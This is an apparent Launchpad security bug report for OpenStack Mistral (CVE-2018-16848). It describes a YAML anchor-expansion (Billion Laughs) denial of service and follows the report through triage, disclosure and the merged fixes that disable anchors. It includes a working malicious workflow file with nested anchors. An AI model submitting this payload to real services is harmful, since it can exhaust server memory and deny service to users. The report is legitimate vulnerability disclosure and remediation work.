Mistral

Denial of service through YAML anchors expansion (Billion Laughs)

Bug #1785657 reported by Nassim on 2018-08-06

272

This bug affects 2 people

Affects		Status	Importance	Assigned to	Milestone
	Mistral	Fix Released	High	Eyal B	Mistral ussuri-2 "u-2"

Bug Description

It is possible to perform a denial of service on Mistral server by submitting a malicious workflow definition file (YAML) that contains nested anchors. This looks exactly like an XML Entity Expansion attack (https://en.wikipedia.org/wiki/Billion_laughs_attack).

Example of malicious workflow below:

version: '2.0'

wf1:
type: direct

  input:
    - a: &a ["lol","lol","lol","lol","lol","lol","lol","lol","lol"]
    - b: &b [*a,*a,*a,*a,*a,*a,*a,*a,*a]
    - c: &c [*b,*b,*b,*b,*b,*b,*b,*b,*b]
    - d: &d [*c,*c,*c,*c,*c,*c,*c,*c,*c]
    - e: &e [*d,*d,*d,*d,*d,*d,*d,*d,*d]
    - f: &f [*e,*e,*e,*e,*e,*e,*e,*e,*e]
    - g: &g [*f,*f,*f,*f,*f,*f,*f,*f,*f]
    - h: &h [*g,*g,*g,*g,*g,*g,*g,*g,*g]
    - i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h]

  tasks:
    hello:
      action: std.echo output="Hello"
      wait-before: 1
      publish:
        result: <% task(hello).result %>

Tags:

CVE References

2018-16848

Dougal Matthews (d0ugal) on 2018-08-13

Changed in mistral:
status:	New → Confirmed
importance:	Undecided → High
milestone:	none → rocky-rc2
status:	Confirmed → Incomplete

Revision history for this message

Dougal Matthews (d0ugal) wrote on 2018-08-17:

Sorry, I just re-read this. I see this is related to YAML. Not YAQL. I have hidden my previous comment as it was confusing.

Changed in mistral:
status:	Incomplete → Confirmed

Dougal Matthews (d0ugal) on 2018-08-31

Changed in mistral:
milestone:	rocky-rc2 → stein-1

Dougal Matthews (d0ugal) on 2018-09-10

tags:

added: security

Revision history for this message

Nassim (nassim-abbaoui) wrote on 2018-09-20:

Not sure how security issues are usually handled here, will there be a CVE assigned to help tracking / identifying vulnerable versions ?

Revision history for this message

James Hebden (ec0) wrote on 2018-11-05:

I have requested CVE-2018-16848 for this issue, which is currently embargoed. Once this bug is made public, we can make the CVE public, too.

Dougal Matthews (d0ugal) on 2018-11-19

Changed in mistral:
milestone:	stein-1 → stein-2

Renat Akhmerov (rakhmerov) on 2019-01-30

Changed in mistral:
milestone:	stein-2 → stein-3

Renat Akhmerov (rakhmerov) on 2019-03-27

Changed in mistral:
milestone:	stein-3 → train-1

Revision history for this message

Renat Akhmerov (rakhmerov) wrote on 2019-09-17:

It's a serious one. There are also other ways to deny the service. We'll see what kind of protections to apply against such things.

Changed in mistral:
milestone:	train-1 → ussuri-1

Renat Akhmerov (rakhmerov) on 2019-12-18

Changed in mistral:
milestone:	ussuri-1 → ussuri-2
assignee:	nobody → Eyal B (eyalb1)
status:	Confirmed → In Progress
status:	In Progress → Fix Released

Revision history for this message

Joshua Padman (jpadman) wrote on 2020-06-03:

Can we make this bug public now?

I don't think there is much value served in keeping it private. Those that are looking will know about this issue with regards to YAML and those that aren't looking as much (operating cloud platforms) probably won't know about the potential risks.

Revision history for this message

Nassim (nassim-abbaoui) wrote on 2020-06-03:

Sounds right

Renat Akhmerov (rakhmerov) on 2020-06-10

information type:

Private Security → Public Security

Revision history for this message

OpenStack Infra (hudson-openstack) wrote on 2020-06-17: Fix proposed to mistral (stable/train)

Fix proposed to branch: stable/train
Review: https://review.opendev.org/736158

Revision history for this message

OpenStack Infra (hudson-openstack) wrote on 2020-06-17: Fix proposed to mistral (stable/stein)

Fix proposed to branch: stable/stein
Review: https://review.opendev.org/736161

Revision history for this message

OpenStack Infra (hudson-openstack) wrote on 2020-06-17: Fix proposed to mistral (stable/rocky)

#10

Fix proposed to branch: stable/rocky
Review: https://review.opendev.org/736163

Revision history for this message

OpenStack Infra (hudson-openstack) wrote on 2020-06-17: Fix merged to mistral (stable/train)

#11

Reviewed: https://review.opendev.org/736158
Committed: https://git.openstack.org/cgit/openstack/mistral/commit/?id=f0824730fcc4bed3614071be2a1fc82a0ed29114
Submitter: Zuul
Branch: stable/train

commit f0824730fcc4bed3614071be2a1fc82a0ed29114
Author: Eyal <email address hidden>
Date: Thu Dec 12 14:49:13 2019 +0200

Disable the use of anchors when parsing yaml

This can be used as a DDoS attack

    Closes-Bug: 1785657
    Change-Id: Icf460fea113e9279715cae87df3ef88a77575e04
    (cherry picked from commit eac23d9e774f658f9d4743c99aa2743eb104c3f9)

tags:

added: in-stable-train

Revision history for this message

OpenStack Infra (hudson-openstack) wrote on 2020-06-18: Fix merged to mistral (stable/rocky)

#12

Reviewed: https://review.opendev.org/736163
Committed: https://git.openstack.org/cgit/openstack/mistral/commit/?id=2968b8bbb743ada6df7e36c969228bef42830224
Submitter: Zuul
Branch: stable/rocky

commit 2968b8bbb743ada6df7e36c969228bef42830224
Author: Eyal <email address hidden>
Date: Thu Dec 12 14:49:13 2019 +0200

Disable the use of anchors when parsing yaml

This can be used as a DDoS attack

Closes-Bug: 1785657
Change-Id: Icf460fea113e9279715cae87df3ef88a77575e04

tags:	added: in-stable-rocky
tags:	added: in-stable-stein

Revision history for this message

OpenStack Infra (hudson-openstack) wrote on 2020-06-18: Fix merged to mistral (stable/stein)

#13

Reviewed: https://review.opendev.org/736161
Committed: https://git.openstack.org/cgit/openstack/mistral/commit/?id=3c2e35722a44c83bfca68ba17e0e748bf53aa05c
Submitter: Zuul
Branch: stable/stein

commit 3c2e35722a44c83bfca68ba17e0e748bf53aa05c
Author: Eyal <email address hidden>
Date: Thu Dec 12 14:49:13 2019 +0200

Disable the use of anchors when parsing yaml

This can be used as a DDoS attack

Closes-Bug: 1785657
Change-Id: Icf460fea113e9279715cae87df3ef88a77575e04

Revision history for this message

OpenStack Infra (hudson-openstack) wrote on 2023-06-15: Fix included in openstack/mistral rocky-eol

#14

This issue was fixed in the openstack/mistral rocky-eol release.

Revision history for this message

OpenStack Infra (hudson-openstack) wrote on 2023-10-13: Fix included in openstack/mistral stein-eol

#15

This issue was fixed in the openstack/mistral stein-eol release.

Revision history for this message

OpenStack Infra (hudson-openstack) wrote on 2023-12-21: Fix included in openstack/mistral train-eol

#16

This issue was fixed in the openstack/mistral train-eol release.

Report a bug

This report contains Public Security information

Everyone can see this security related information.

You are

Subscribing...

Edit bug mail

Other bug subscribers

Remote bug watches

Bug watches keep track of this bug in other bug trackers.